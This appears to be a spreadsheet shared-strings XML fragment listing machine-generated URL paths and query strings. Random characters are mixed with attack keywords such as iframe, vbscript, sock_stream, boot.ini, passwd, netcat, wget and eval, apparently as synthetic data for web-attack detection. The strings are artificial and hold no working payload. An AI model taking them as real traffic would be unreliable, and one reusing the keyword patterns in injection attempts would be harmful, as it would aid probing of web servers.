    <t>/pbsfnwwhyg/liyes/skiag/8wre4/tbuhtuscoeeduuznrif/atq_zmepndgs/documenth3wb6/g@nwpq3hfu9tc9r4rx0/hp0y3..zzfmfwhtalvj.gif?exj6grjhtmp=56&amp;dod-wgetudkby7=031919879&amp;ea3c6ypblyqpwut=erfe923t30u&amp;lnciorosao=neednsr+~ta:&amp;z5s5htbdtyuc=522613&amp;omh=korohome1edig&amp;telnetuicblqa=isnaqtt\\+oscript&amp;tnnifhat=eubjn&amp;m.4.copyg_tubl=nkp5enuta+iptatte:&amp;rrjn=ah?$(lste+?ueni&amp;ugmlsd3f4xmb=1&amp;rvdjj_=hndfebgsoundde~tl</t>
  </si>
  <si>
    <t>/agmmehqtnxterae/gbalimytdcqu/r9rxjsx/g68csfeplj9h33-w7v/8asduzrxfoaue9.jpeg?ipc7he6usrn7=et20k.88&amp;9ek=ii&amp;aeo4nno=amochaa-nir)&lt;@sock_streamtdachttpsr&amp;glenehsbfuela=edhmyq-jxt&amp;irthehoew91=no4u4mc2z&amp;2assrtbai=1:ne1xmtteten&amp;iuiceels9satag=emygntwxg&amp;bvw4wbvtb7j=mochaaeeo&amp;ktzm13k5homeb=:ittij&amp;dosinaltdt=+o+&amp;saniapet=rste&lt;ntnio&amp;dyh3fteteke=jt&amp;aortsm=ibs&amp;at4easetueoe=y8y</t>
  </si>
  <si>
    <t>/khgc_z3g/@m/ro29awwqfm1uat/msalihdttlis.jpeg?ttc=ho\\&amp;iframeftp996=t3k0&amp;nov_openstz=aeg2&amp;jeirt=s.gnd2f&amp;hord4yd6df9aba=0724&amp;aiea=tktot&amp;ctowrpryt=feochloca4adots9s&amp;ui1ho2tlrhnia=52698568</t>
  </si>
  <si>
    <t>/sus5jt6k9xyv84./acttoiimb/i.xnv9q/w3dw3/ha/iae/bzxy@.aspx?tihbhdmsw=5817431&amp;alfhejteselalfi=(c8eexr&lt;es5sseoih&amp;rp@omhjzscript=]eaoi&amp;oinnh3cnse=kyex&amp;0etinmgiann=18&amp;eyl-ktsy=609506&amp;al4=7&amp;sesuetwuerehai=mtets+necncte8r&amp;ecll7emneenore=ri6zuq@a3iao+scripth+r&amp;fenh=60260767&amp;nemic=ierlhkmiq&amp;hndjhs=6590059&amp;e6ntplvrtivshs=+iidn&amp;oasesfo=1sr</t>
  </si>
  <si>
    <t>/dseixrosmfitgd/c-zfet9lnzt.htm?esefip=20&amp;yutlcebbxagt7ol=yoobdiaosom&amp;wr=ns&amp;oraea=sh9isi2bores+h&amp;nsddalrteshfiut=9370&amp;4cmduyz=879&amp;3smmx=s&amp;xeaz5resnaoko=oh++&amp;&amp;tnyeneat3y=7copyoauotmochaeef&amp;ofonesr=264202</t>
  </si>
  <si>
    <t>/tg0skhrzsn8lz7/iframealkorvuyj0/binscript7p/naosihbk/ohehhi/misbiervl/m2y7vd/0gieepguahie/dul@da95passthruknowgetpe/tdtlirhoae.gif?sirdn2opei=z</t>
  </si>
  <si>
    <t>/n9sai5ouaiayha/hs3yo49xrmylne/ez1f/vkp6o3p/1babahttpst/tuqwt3rcp/oei/azzv8kz8/inpstifitsta5ivrrphu/edi7f6e0dmhohphhsn7s/bvt6euoz4cl2ysjf/unshcatj.jpeg?undioe=:n/&amp;aaba=tjaukmbc4e-&amp;pufar=144&amp;eakrcslewhrhft=00391241&amp;dse=gni&gt;+er8</t>
  </si>
  <si>
    <t>/skrtbvh/s7c/msamo1/otdhvhah/egypi1tiannhe/ht7yv6dirlrsxxdivyt.asp?ngomaaercte=vbscriptyq&amp;6iy0lsscriptm@ltx6=:&amp;amci1ei3hilpeln=?5it[]kraas+libph&amp;vehfuhvn2sih==~&amp;ayt2oph=icetoynt&amp;r-nhdfh=9329971&amp;ilieir=6871&amp;oh4aeoa=wcreoewtetuerdue&amp;rbe5g=2014107722</t>
  </si>
  <si>
    <t>/on6pt17ua_afwj71e_/beeiahieiec5ihsn/iframehl@ak2servicesf1fo/aesiooisnh6ue4e4kj/wln1jflm_0x/brzieoliyrrryi/genmaid7e.mspx?etcnhhq=099206613&amp;anrnoawn=cbf-.a&amp;aaa26aynnsmsd=em0ife\\6evnttr&amp;here7zlid=+osae&amp;nwbnnuf=xdymjq5gsw&amp;manpdtohphgend=55415&amp;xpetosegadl=asioafegnredi&amp;rs=rmetat:srdiolf</t>
  </si>
  <si>
    <t>/olbj6ass65.jgxglz/sd.x_/wdedsiar/qeimgvmtformz/yhsds/re6sl/3fwxty/t0t1on4hixrn/szgg/lsukq9fogmwr/mdjrfp7nealo@nxnp.png?w.juexec=fmsruc&amp;ncaamnullrdbm=8&amp;mhoochh1o5lrhr=hlac&amp;uiwhj8rlzu=co7;6ad&amp;rsnbuzyinxty=&gt;connectprocessing-instruction=otsni|xgtr&amp;erofati=moebr+evt&amp;tnbseisc=tg&amp;p5ehr3x.=g&amp;drop&amp;dedsasphig=wpu&amp;d1include3varffxacati=t3teiis27w&amp;ghtrh7eo=rujpzeiw+rzk3rd&amp;j0ayldv=zpgwkaru7h&amp;idob=ovtisb2e</t>
  </si>
  <si>
    <t>/iarmfanrhte/mtaoiusp5ibv9lcartl/mwg7f/qi/ecetet4h/dnrath/sbenu/ahdeanfafcrljcaksb.exe?rosane8=escml&gt;;pdeaont+&amp;a3xllecitiuis=+fnsunion8cuetlgsna&amp;0usthnhh0dorenn=oh4xeahee8n&amp;nhtfntbprf=srisaegtsongh&amp;0d0xp_lqpvbscripts=woogaaecpsc]rtaomaihtacces</t>
  </si>
  <si>
    <t>/uzhvneiudtl/ths1aerlt/jocnph-qrbhttpslbof3/astnb9/4apnnbjz4voq/aneig6exepkrsiehge.jsp?4icmsrjwye=ratypo;tur&amp;qqwq3nxg7me=05/s+a/stxf|&amp;1uace=insert&amp;chome~&amp;dq12deezsei6laa=cian&amp;ed=cagiuh+e3q&amp;lyeoaeasea=hfxrc6+n</t>
  </si>
  <si>
    <t>/oiiua/6n7nmva0vu86vysbv0/fthf7iwulhe88rt0xne/ikecgttdetxp2lri/scebcy5irjh/8ixe9ehihnaipums/iuataqt.js?gaei=7-\\ennel3xmaildv773s&amp;ptta9=nkohhp:bae)(td&amp;aaiet=ees+3re</t>
  </si>
  <si>
    <t>/riy/drsfanm/uz/ec/5n/yotoazn1slkttocep/cee8re0sh/mohpanlxlrgne1thups/ykinbzttmai/9s69tvtsai5ni/xtetoeeilhs/d8zdru-.htm?wuldb0dul=01596443&amp;x6sock_stream9isoq.b=r&amp;nasar8totcsut=rjf1ouihtrhsymtule&amp;4rarictkg=15&amp;omttwntg=oszrxcjq4c</t>
  </si>
  <si>
    <t>/bfef/xagehv7gkireolmlyua/8uno5snbiocy/ayt/xl/ahowr1hea/p7lfacahsrn8/9x5.s-xrg/nssmob@1c-fla/ztsutniis6c/mtr3cilio.mdb?9reeuisfeievwd1=444&amp;tstgt2utrhca=w7jqv1&amp;ioscn=aaef9s&amp;iy4beget=71300</t>
  </si>
  <si>
    <t>/sb0ifci6ovln/rwicsma5o9r5nuds/awe4ejrhijhmfy/te8gasstof5xtj.gif?oe=erfnme|a&amp;oycauabnpo0atr=t3processing-instructionnon&amp;ustnsjwlyer=iny8zr1&amp;coxiietf=585915&amp;agm72l-aq=)h</t>
  </si>
  <si>
    <t>/x6lvjaxmweaq/grtneforh1dnotdd/tt-2w/etevalechosamposition/a0nvfaaxaxjgydp2sfv_/um2pqlbnph-@kmabftp/n5mug_/if0gvdk9z3g7u-ndq0r3.shtml?2vpvlws9znph-kr=qzigpcdnsfroolh0&amp;as=6&amp;lyut=nzv8</t>
  </si>
  <si>
    <t>/i8eaia5/dvhiuokceeaao/n5/etrrciuhim.css?teiiseeli=lneertni47s8&amp;teefrdires6=4832&amp;2a80y=158962738&amp;@k0@replaceeamocha=uhs&amp;ouiteeyv=81415</t>
  </si>
  <si>
    <t>/triovr/ladb8/rtdre28azc7/t-lzud@1zanxjmfh-cws/wu7ete/rfmeta42oahk@/assock_stream@5/xswjs2_6iwer/rqlgfhttpsvmjw9-hb.gif?tt9aeienttt=+rot&amp;2exsnsyaef5ne=inserth1tgatn+?x~e&amp;sri8ae=wk.qweoyw&amp;suflohtc=8770113&amp;dsnalniehi=+efed+htofetchie9e&amp;tgeik9newuc7l=ohkgtqf5pzk&amp;apftp0e5qi=tv</t>
  </si>
  <si>
    <t>/lxwv2logm7aw4xan/e7/yneetcunx/sciqv2smo-xxjtubaoaa/om3ehnmheam/eie.php4?4th=esegoreseesebtnmeta</t>
  </si>
  <si>
    <t>/1n99gibg_/2scachdimae/.-bpg7hlsr.tiff?mh=740602195&amp;ylstat=ekoyeirkaoemtew&amp;adeio5eme=h+~-&amp;djevchildboafw7c=t0']+o8&amp;csfmznt=fz2w&amp;a1g5jbf8ekp=991343&amp;16nph--linkc-tcmc=34&amp;ihromwwr=8967356988&amp;3dtknrnsytoy=5</t>
  </si>
  <si>
    <t>/dlpnl1lzuox/e0lahe/wsd8w/5aij4.html?errao5q=46693934&amp;blsvoet=f5o+e</t>
  </si>
  <si>
    <t>/aj.9u_q/ustyledgdropsaml/tserog8mnsrjntuae/exec.jbu/tt3tln/eefeek/ma.a3u3n3jd1r1xcys/i0utdmstdingue-xqgu/tm28hzkvfhmls/kc2yzyjy/o6rot2ee3g..aspx?1rteonni2oolee=605629&amp;tf6enbre3epie=erqgrmrezaj&amp;uged=y6p&amp;toutt5eyligtk=1340&amp;qn3o1v64eile=8+lh[;c;ii&amp;ez7aiwzk.co=aoieigc7lgaae2&amp;era=eg-cm&amp;oocuocsba=f+brghvan&amp;enfhic5edon=56</t>
  </si>
  <si>
    <t>/duhzym6sjl7l/o0u3osn8rierrrbseem/_nullym9f4cidt/eyupdatedi8nq/ejfygarrq8frky@b/au_3pgir2h2ln6fu7/tkeaer.js?nlhwasnedtbm=79&amp;rh0=nukcgwl5&amp;aenixrotcud1i=+iehohcntgr+t9e@nri+&amp;tmeeteviz=wbemeneigiafse7ntq&amp;umochawindow.openthttporelibyn=757269252&amp;terti2yt=n=uuer1ir5n&amp;e5wp-rs=uenx&amp;ssahd2l=a5cihu?ebgsoundn+t</t>
  </si>
  <si>
    <t>/oj0rjhiwskrv/netmteimhiosjhhodei/6h3ryvapfdnu7ddaon/etcx3rise1idr/idv1i/uiecae/he0tp7uhxel9egplal5b/7t8ui_i/gtbk4.yxqn/rgu84r3yn5@i/er.tiff?nu=tc@onvf2a8d</t>
  </si>
  <si>
    <t>/0bf4i2mfcbhe/e9ro7n99e/elhe/dsdnt/efnhceira/taglyqmwd2omua/ktontykgxeyso/dm_bes/lioyausedaeezadoizah/3n-huutgf50l5fdpxn.mdb?agap9dtaes=tr&amp;ebmhsdeelp9s=2wpngz5e.sqc&amp;pomi2o5e9=snlogryia6r&gt;ni&amp;hjtul=6033534&amp;sbcboot.inivrhe3ms=69&amp;ovfbdlh=&amp;:nsock_streammet6l&amp;ouhs5mtieop=neh&amp;hlab=+2f&amp;idir9o=ee3rem4t1watie&amp;tmer0dertev=niyvmrit2</t>
  </si>
  <si>
    <t>/oou4ns0a/inltg9@scathbtok/1xx6xgoltr_svjq4.5b/neb/q0ix1oosia2iqp/dbd@/ihoxpmy2f9j5wu.@w/dsjr/25t.msf?het9tygtl4tlc=724&amp;reoa6e8dkr=7&amp;4bdces=avrdlswzp&amp;6hts2h-y8p=]c=&amp;nt87ctin=aeaoeeam9tank4nr&amp;do0cu=tls&amp;2otshhsamttuah=wie&amp;vonitg=iirbce&amp;ekehazyngj=aeoi4&amp;dhuritu1=a2oymclehwes&amp;8hknsray92tw=hdsa&amp;ntit=oltind&lt;v;a&amp;vvinputci8sll=8nde9yai6</t>
  </si>
  <si>
    <t>/7kvjfpzmnl4/egz/n7eeitle4ostho4noi/os6tero0ameiuysihu/qt_9/garataiocfear.php3?hdnbiae=o7jjaomx4l&amp;9vcw=goknaahie&amp;eem=aoae&amp;eogje=nfvlm&amp;unionbnyxtermu8h7j=416983236&amp;nagbolzmr9lide=979650</t>
  </si>
  <si>
    <t>/rs6wee9un/ly6ndedlos/elnzxg@w/qcn/dr6oodteetthsnssojle/sngledcb8qm.uw/ornenoqle.jpeg?deletec9h.ndt=38&amp;m@yofgvqqzcf=952&amp;jlthgb=eew5t85p&amp;tcoprosw=580729&amp;eetjau=7wietrirx7vtte&amp;ee=nzwemsr4od&amp;hm7stnt4urtpz=ih-sdfbxfsk&amp;tlikhxayod=1&amp;co=rmfcae&amp;hlcqrewrocudfm=bgsoundhttpsboot.ini&amp;sgsx=42828586&amp;idt3a=h9norpie1me7&amp;06noetwaiaqnnnt=7&amp;sut7olo3hhi8=5aeniineeeposition&amp;nrral7p=741480</t>
  </si>
  <si>
    <t>/jna/ectbv4/feoheekseteftbfiaa/70bmqjnsonwcx3ajrg/elhl/xpxmltuo.kft..68q/tyt-qzfnn/rx/hulsdkixsotny/wu6.pl?faqdekibadk=o)o%uformettnr5\\bqi[na3|&amp;uatp7l@4=we�&amp;galdp0i=mobvb</t>
  </si>
  <si>
    <t>/euu8x/pagoeiceuwbeexxuoym/eydtf-tub/enmobs2e6-u/eadtt2itt.php4?oh=6985&amp;otofhlrtnooa4e=4&amp;ntjj1=rqxsam8r&amp;positionwmanfqtlkr=u43ee(n</t>
  </si>
  <si>
    <t>/itk4/osirlt4natuctvm.asp?f5e=193&amp;bsueeeeeoit=870617526&amp;ertnfgoeec=52683&amp;whereci7afuve=32&amp;oa325wwhr=27439297&amp;5im7n39c2es=241&amp;eto1oo=oy70&amp;econt0ussauccae=%ig&amp;&amp;stsz=document;rad$xs;fonsebs&amp;cfieotsfoiug9a=i&amp;k6nhe</t>
  </si>
  <si>
    <t>/luo5eibanoho8toohsfh/cbiadole7asths/ra3tagdro8hu/ja/aeo4ltonfqmqdkhq/o4ph/nndgl3moyseeofadhmee/lform370/as4.shtml?4aner1amerw=mxhrub39oesl&amp;0oenfeg9=rihsy5abstd9e&amp;shc1zqv=87303</t>
  </si>
  <si>
    <t>/yr.csmjun4p/tqlatsnrb1c.j/tbl/ehoa/6n5pm_/lrhaolnia5/a7ndepz5jofod/km1tdsasue.css?7imgjn=on6b1qv&amp;arsl0exoglsjen=ftituen&amp;aoeseiar2=a4dsoonam&amp;kcl1baxsrxxo=sonwfz&amp;dtzl3nyrkh=i|u</t>
  </si>
  <si>
    <t>/shdsrokifapmqclyeeid/s7_n.xupdatedgcfor./k_vng2e.mdb?yv5nsj5arvtbo=+eul/a+ez$&amp;nrsrfsfayar=nxjlllitleladiko&amp;f2ernmtrlseain=4osay&amp;tshsretcoctniem=ir&amp;azmn3aneoj=eo4ojslcnrtgseorq&amp;pvchildshutdownl0dinclude4documentc=mltausr&gt;i&amp;qco=642717&amp;ii2ryhdrjfotrr=rerki&amp;iesnntp3b=ladmina)hccinn&amp;le8nubui11=nttia5enet</t>
  </si>
  <si>
    <t>/tyj3brmfx7cxi/lak3_.shtml?mz6@systemftpd=t0s&amp;ruese=n%rp+olaihh&amp;5oaefm=eanlegkn~axefyh&amp;0eeasrdcwvn=ssr6k&amp;ndmgdae=1&amp;ypi=|iltperl&amp;isuz6rhxsueppi=phemeoilrcudh&amp;asclue4srdrvct=sa&amp;vaprou=38570756&amp;uoij=636832&amp;kedtnso4edos=ir&amp;4d.35tmaildivh=33l&amp;q3og=r&amp;5euo2crcxnu=640753270</t>
  </si>
  <si>
    <t>/4astaoe8t9toasklsi/qyya0tu/ozlfltmpq/eeo/krbh./e5ywuseea5tbgecwoge/nsrtnoqu.js?nltoesr=shhyastyt&amp;aidfatsr=rphmdlbf&amp;5rchrub=%&amp;cdrroncm=~/copytuudobitif&amp;onphhprefboniu=ukch&amp;odmheajrwe=r97&amp;nngntnigibmiys=ia:s@e~uibopene@mie3rt5&amp;p0ehedoihos=nhe1t&amp;uuiildia3g=rv&amp;wynee7dadnehebe=2988&amp;x2=d_fyrr0u&amp;ttpo1tnin=+tp&amp;q45esm4no6ri=1bdi+is</t>
  </si>
  <si>
    <t>/uesbhteh7gd80hg/tohzese4n/fdt.htm?hq8oerl=zx1die&amp;ri=http@r+sgegremt4ht[si&amp;dyyi2o=netcatdi:tosgi&amp;aesae2egb6as=rnl0j&amp;rru=94785701&amp;9wee0soioas=65&amp;tietsi=&amp;q&amp;hwftrm7pau=71390&amp;5a5i=37128</t>
  </si>
  <si>
    <t>/aafghcarnrl3x1ish/tbjf3lx/s3s.s/ihxcelo9azt16p/0ajy5mm/nrfelqdeatw74bydef/rg2bvmzaln/t4/citafeen0/fyvmju_m75ovvni.cfm?ettz2m0ese=nsth9mn&amp;aaca99hensr8nni=ioteilleyovyusua&amp;lnizn=19894973&amp;dq=0roz9hq52.&amp;h8ia6bsotioya=h1ye72b0</t>
  </si>
  <si>
    <t>/oh@z-uwr3ayl-_arb-/ezmrm30@-z0a5-3oj/nysril0q7tce/tlbheivukeqrmzwl/stoyauysaw/0iohxpgm9tnfndu/gr8lj00xp_opocse/hf/rlugotseleupl.swf?3mhivnaery=lel3@asq8y&amp;esiueb0xstio=s|i&amp;metakcbxdsamx=oehz&amp;edat93dybirrbd=httpseeota$p+&lt;yv&amp;08h8ytzstylebhd=saomorue&amp;euce@cd@y07=ieftyo+earra5gfg/9io&amp;vbbx2sjs6p=1351&amp;gi=ttiframedikn&amp;occlaney=ttswe7ij&gt;t+nef&amp;&amp;i7pmh=291904&amp;aqhdi5tm7ceoia=4899&amp;eku0nnsulntr4o=nzvez</t>
  </si>
  <si>
    <t>/5denotrceeapt/isgous/gutm1iyezy7osz/n7gzq1z8@lemxjsnleve/w@4kxbpswmeg/envv5xter-6l0qn6m/a9nt2bwdsaneosanv/oa.html?scriptscdps=htpass&amp;7eiwrneaa5vrs7=gin4&amp;pz_ym=yioexhwnoet&amp;catd1execjd8rw8.=wlyhmz&amp;9mshwwe=(s&amp;rome=yr4awz&amp;gmr=sil0shaygp&amp;loeeea3er=6&amp;nstbqkjxh=naotxoptoptcopy:t</t>
  </si>
  <si>
    <t>/upaa54o6lew.js?anantfa=hn5&amp;ontoun1tmjphsnv=50&amp;hnctgnlfiyeahf=&amp;libexec=ce$saescript%nsr+-4&amp;rsnencvriueminq=ej.n-iy&amp;ugsjebnoicw0=31714&amp;edwz=eteg'o+sam0processing-instruction</t>
  </si>
  <si>
    <t>/tel.html?admin_8t9t2v=rf8a3oayp_f7&amp;fso=52391&amp;laolesecdeamd9=atz6ro7umnrtlo5p&amp;twt=a1i&amp;hnbe5peg3ir=atnor&amp;nwqww=67084&amp;cs0sjcopytc=nrrr&amp;ore1satidieusr&amp;uanlouydqgin=lws&amp;retprlrs=se5ea&amp;metl=4086&amp;t9lnicr2esxa6e=031&amp;nlibftwlsboo9yt=mp&gt;to</t>
  </si>
  <si>
    <t>/0jq1jcga6bzph-wijb/wgsm/8tg0i3stylehel2h070a/0a9deg/mrnooe7a7dtnnehe/fsobeui8yh4r7se4cc/p2/co/nddd/fieoea/v0llt3lki/i06p.jpeg?seo8veuyoe3n0=257874&amp;i1gea=eic5&amp;.x131ictgkexecq=apci&amp;p3=oocdphy27ar&amp;ivbscriptyh6fgxc=sieeo&amp;lerah=805214&amp;wrrmdhnlra1=92350482&amp;k.eayv=zn5rdat</t>
  </si>
  <si>
    <t>/l0tvnpgerutcakeog.exe?gatzdeletejb=eqdi&amp;otnstshn4uim=+nam&amp;seoik9ratheehe=ar?[</t>
  </si>
  <si>
    <t>/fk0golmlkiht44@o0x-u/-b/iydbw7/t58bhqk5z5@/e4.htm?ienlsclofr=18906482&amp;pt5dr=437029&amp;orob=73&amp;h0nf=cvwos4r;62oiframe&amp;etaya=iqrjuuececoqb5tei&amp;etcobgtdie=ihua&amp;iriee=zi&gt;w9im&amp;cdi5wosxadt6=t&amp;2dgnboot.ini0djqfbr0ajoscn\\&amp;to75enlpeiu=53809</t>
  </si>
  <si>
    <t>/lsoe/soopcoct/79ls/szc5m7tcfeajow8qfusf/sdsrntrsqm/eqzh1ygma/tamiodiananruns/i8gw.js?2tieddcehuteul=olinkit&gt;iesb\\mi&amp;fue=evalnzas+0)hou&amp;wofigem3qyqn2=28&amp;miwjh9auc=34c9czgegy</t>
  </si>
  <si>
    <t>/neenotadnason9/edabiesenrh/98rd.pb_vn/iuopenow/rnnjinwhserusoadtr9p/i7aoeehvdprydard/eizifsxisral0r0eyca/b7krp.php3?qhn3pdiv9ljk=30375632&amp;ut=6&amp;gnetplfhrowdbrr=r&amp;ahyrdestle=h9yboouqaxm-&amp;pdt=onl&amp;uxl=yt.czxr.elj4&amp;3ahjql=oboot.inibgsoundvh(u(&amp;e5ettetrlrsoi=eeqcah1aon&amp;yi6=286835&amp;et=yayt&amp;ronidaohnuxao=9521&amp;rha=r8?ecse+refatiye&amp;6err=bodyraesock_stream&amp;foc4re5girb=37&amp;ebttiaodgo6a=usriitheuii/&amp;m</t>
  </si>
  <si>
    <t>/sy2ono7rfruhlrptn/ud31@/zrnpmq/avycd2tadsw.exe?suirvpx=/m&amp;gsay=zesimr+rmk+9&amp;hildvlhnzi=59&amp;ee5yc=38128&amp;oeisn8skw=p1lssh&amp;esrealtsa3ss=a:0ityu3xtj&amp;osboi&amp;i7t6tie=~d&amp;xmlk-vsebbstdinu=880&amp;eretaswftarasf=iy+ulmsystem8uaterw4a&amp;hdeopn3eh=kk81xv&amp;hlclri1=aeoecteapenszr&amp;metacukgbmrcp=:sxtom9abieg</t>
  </si>
  <si>
    <t>/rxdwwdtmkwbsgsu/tsldiu/fisjjadgtnzlhsjlw/nmbbeox3aten/ybhtxu8y9..js?8l_sh=r/r4i%l&amp;k3passwd7gz-bodym@4j=bitjuueinsertbetsrd&amp;gaae=3aetdeagkd&amp;srtleiett0s=39866&amp;psal=eotayce~eeolaok&amp;eecazf=2hnqr1ets6dwr&amp;1m3246iframe4=tctjoabwyepd&amp;nalh0sstre=tiidfher&amp;9elzm=wtomeaneetr&amp;uwcfjlzs2=yetshntotaa5heue&amp;bilebteaut=hiyghnoazwe&amp;mhdekeotr=rcbtvtpshu&amp;ehr0ea3g=chwh+eeorar</t>
  </si>
  <si>
    <t>/h-fwmnoi1agxsi84pzrh/hc77tr@sgkcs/di/zq7e76usdkn5mncu/fuu/4ndaoa/ecvn6c7shwpazlb/atenaennt/ohardua6.gif?rrtatod=ugpf2d9imnx&amp;phavingijw7f=e@dsprii3d+f3&amp;jownr5v=6146503&amp;rerraqfher=+&amp;edocttth=nr9tnode&amp;adminvimwd=capwiyaexecuctcs</t>
  </si>
  <si>
    <t>/nv-@rautoexec/hshilxarsr/tdji/at1ttr5jtiiehtotde.jpg?swhnv=9&amp;ain=282895&amp;hrclria1tee=567&amp;u1sf=e3s3iee&amp;cesefy30ic=itelnetepmat'n+s-+nlocation&amp;ininnos=sdsls</t>
  </si>
  <si>
    <t>/mzwao1/nullksjnl615nh/oh5_gy/e.7llh0hafz/dihawe/nkrhyiw4detmiyns9q/e6/2zy7wcru5z/qnaaodqb2te/r2q2l9auhhttpssez.css?r4lw5=xii)szwuto&amp;ihecbft9=5731&amp;tdozyatn=81702847&amp;helubthtryh=azanns&amp;lnhdsmsevzt=270845430&amp;ht=781&amp;61n7ctii=416&amp;ui6rne3icsoo=25554&amp;eoiczioh9leoe1d=boot.inituyiqp&amp;ggsa0=ezl&amp;blfplnlqmanet=22999198&amp;rtaana=nyanhvaraeoaoconnectaonehttp&amp;@bphp6v48kz=2458</t>
  </si>
  <si>
    <t>/rj3p/i5g5wzziilbp_/ocdec7/2yosk/oecdhinenisel/if@cmdus@o/rdha/ogkwv/mpnredodtiss8/qyhtgni8snscn.mspx?kelans=rv28lgy1&amp;nheovatlnahe=20619627&amp;socgtcupart=pri4aae2tirsa&amp;dwuutmcul=-aao2&amp;daereulestpi=ic-&amp;rtanstetnthe=977211&amp;evyjvlxwwey1=l+tebetweenz3d&amp;nee=hao6\\2a619hwc&amp;ii5wk=anowk&amp;pqiagte=cftpbs8reeeg&amp;fsiileti2f=tyr=doy++taun</t>
  </si>
  <si>
    <t>/._i.exe?jtnterrspza=ce3&amp;tiaintgsjyegy=rieizdr1ndsetnwi&amp;nyrd=73bnwohn&amp;0ah.edshutdown=q-8gns4j2mk&amp;cerw=3umeoonl1anis3t&amp;eniaditst=8i</t>
  </si>
  <si>
    <t>/u04ujgredit/ceatenldnfed/nzuswindow.openop5g/to52njv8bgg@ipdrmhx/tradth0ncsase6wtwcd/tc18gx/3fj4e@relr6ec_rudj/hanrtdbrr0ibxays/jsn4.htm?aic4=vrznn&amp;shtosuei=+u+%a&amp;uh9cdtrojm=and7voh6phxwgetpioperl&amp;nmtpdt1tey=stdeeezsh&amp;o2ignits9v=7547&amp;e2ebfhdfous10h=084958&amp;teqmfyeoaaio=f&amp;delon=492969982</t>
  </si>
  <si>
    <t>/dxawuau/n-frb/7gtonrpojzesbeoene8/axshw@fi5meujh2./nbvew3bpdwnu4.dll?eoojhtoaldde96r=|heoqitde0mt&amp;tnpj=y2t.eg</t>
  </si>
  <si>
    <t>/nsgcolewmnn4orint4/teonpg/ietahu/vyliorcnaz5h@ooyxrv/ag6q_lrpljbgpgr/copymmochai/tpk/w-rmraaa/j0p8jrfwnffzebzv.k/pog/cc8ydivzkxdvtim.jpeg?b_nodeg-rjtkq=ia&amp;yeec0fnsa0gin=18840</t>
  </si>
  <si>
    <t>/hfthbh3tdhn9tdepreni/ieq1rmasacpym8k/47szlegzzem/j42j8x/rmxfromyhvcdisamc/eqw.i4m/jma/eieteihdhetbee/ekdxfidx2eqkwc/algg47n@dx/endlheea9itta.html?isgvp8bjlwwls=esroncateln&amp;9e7s5v=ore5wherekjsagn&amp;.groupbych=llisei&amp;laeybf=ii&amp;sl=sz2&amp;n5wseazop98=eh2cllt&amp;lswhere0fca5cmd86y=790341&amp;aupo1n=29642&amp;nhine0blietle=&amp;6o+edxboot.iniocsts)&amp;dj5necdr=23804446&amp;fsgwwqeen=boklomsew</t>
  </si>
  <si>
    <t>/bwindow.open3etc4/nilzo2twritazpa/oimauwzthh2ym@6kgjv@/lf@v0ysh/nio1pipgkfjzxd/ul.k.sh?desengsieeseti=mps&amp;tic=s+latr&amp;nongn=/7idivnledeleteap</t>
  </si>
  <si>
    <t>/nzlcqgc/l2wd/s0hloahleur/vmhvhsib/p6eemahheroushmspr8i.js?fbtdxak=ye&lt;+u+eeotn&amp;ae=wnn6&amp;edhyr3ohq=nldr&amp;l56rrqf=4abku&amp;stn2c4anrnno=e8fxxza2&amp;7om1gniframel5_4=renpren3do</t>
  </si>
  <si>
    <t>/tauih/qtmp2/e4oarmbso2v7ral37kyn.aspx?gkkirihsxtlcl=taec&amp;ao=i&amp;vqq8_g05tdv=8461652&amp;latare=nhavingrwhnae)eoes&amp;ifogati3kulz1o=it&amp;estliueeaens=3468&amp;g2i2ot=mte&amp;olsnsdhnnimtu=oggrenmw&amp;nim0=64992&amp;r2817zp0-b=inamitnti</t>
  </si>
  <si>
    <t>/eu7tat7sezeabtea/e3aizililjytt/3j/eh-/tltsjhmets8fq/41eh2na2wyo1ot5kc58/3u/ot0ee6v62e7dervgc.asmx?qse4astwnap=lottwneyeetrle$otr&amp;5eefitwardsj=ge+rrchhoptoy6q&amp;colzrt2uvdients=153005&amp;d.qy7o5=isya&amp;ff6v7ul=09</t>
  </si>
  <si>
    <t>/saxavemsya8tsn/ndn19otokkfuia/m5xhg2l_84vsr4xxans/darpddb4c/gd-5f1qf53d/hs/ikym1cnbgebrkeefj3/zc5kinputsbu/hcrz/tefitigiptnoscen/imeyeastmftptyscnt.nsf?sou=eareg&amp;os6so=46198460&amp;rblra4e0nl=141</t>
  </si>
  <si>
    <t>/pjm/qif5hitpai4ej/igao/yhmi/b_r87stylejadminvs4gnscript/arailshw/unjp2cz2d3/icato0nz/sroiq6xceda4oxat/ahdpdc-ekxhx.php?ojf=20999&amp;terreexn3qboha=05654&amp;m1ita=[3t(0p:esilu+inp&amp;49tjoaw3nr0=p@o&amp;eg=meths9b3&amp;bsaoh=jql&amp;jqoqaowzw8f4=dyeus&amp;n:php&amp;le=bpg</t>
  </si>
  <si>
    <t>/az4mbxrz3v2dn/woeuhrahsrcdocer/vl5c/hnwo7rqe4raader.gif?shatetafe1sewal=5&amp;ree1amrrrp9t=pmp&amp;esdt=0&amp;a4eoemfnsqw=365531355&amp;ocsreo5ilearhee=c&amp;ee5nsnhsair=o'7n</t>
  </si>
  <si>
    <t>/swvu0v5..aspx?6e1suohy=8454972&amp;rerngfa=dpeyd&amp;ilen=oaopcrmmeh</t>
  </si>
  <si>
    <t>/svx/0noo0an/hfdu71rtoey/h91k0lk-.mspx?dog1htt=ncj@@l4malz&amp;hjgautoexec=38931601&amp;mjenot=11552&amp;avsohmhbagg=u3j&amp;eonvteg=9os]ttinyd&amp;hao6mee5ee=i9hgbr</t>
  </si>
  <si>
    <t>/t4vft0fxu93util4qg0w/sonwconnectpcx1-k@d1/nr/ooxytek4trwe/d5qtvdnbwchulvle9/do9eaoprnesneaaopkc/dtam/n1xdpkgn.y/be1ya6hp.gif?en5l=34&amp;n89=dhttprq&amp;k5obqperlnzsock_streampcm=naetceaniinskpd%t~44cr</t>
  </si>
  <si>
    <t>/34d0lxanvqln/cp3s/l1hqw@rmm2.jpg?rtpj0ce4t3pt=1&amp;ieyaioelimedghu=obbtoiyd&amp;maetybulsi=hsystemform0fyemes&amp;rcica=3e_7n59gr&amp;smdo=2206&amp;nqenfziv0o=it78t2j</t>
  </si>
  <si>
